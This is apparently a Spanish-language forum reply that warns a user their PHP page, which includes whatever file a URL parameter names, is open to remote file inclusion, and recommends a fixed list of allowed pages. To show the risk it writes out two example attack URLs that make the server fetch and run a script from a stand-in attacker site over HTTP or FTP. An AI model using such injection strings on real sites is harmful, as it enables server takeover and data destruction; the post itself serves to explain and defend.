con ese codigo se podria colar cualquiera en tu host.
Te recuerdo que se pueden incluir paginas de otros sites, segun la configuracion de tu php, pero por defecto suele estar activada.

Cualquiera podria hacer un script y ejecutarlo en tu servidor:

index.php?pagina=http://www.sitiopirata.com/teacabodejoderelserver

incluso un ftp podria ser valido:
index.php?pagina=ftp://www.sitiopirata.com/TeVoyAborrarTodoElSite

Las destrozas que podria hacer no tienen limite.

Lo del bucle tambien seria buena jugada, pero inutil porque solo molesta alque llama a la pagina. De todas formas se soluciona haciendo un include_once en lugar de include.

Voto por la opcion de manu leon, aunque faltaria hacer el include_once(). Lo mejor es no dar opciones.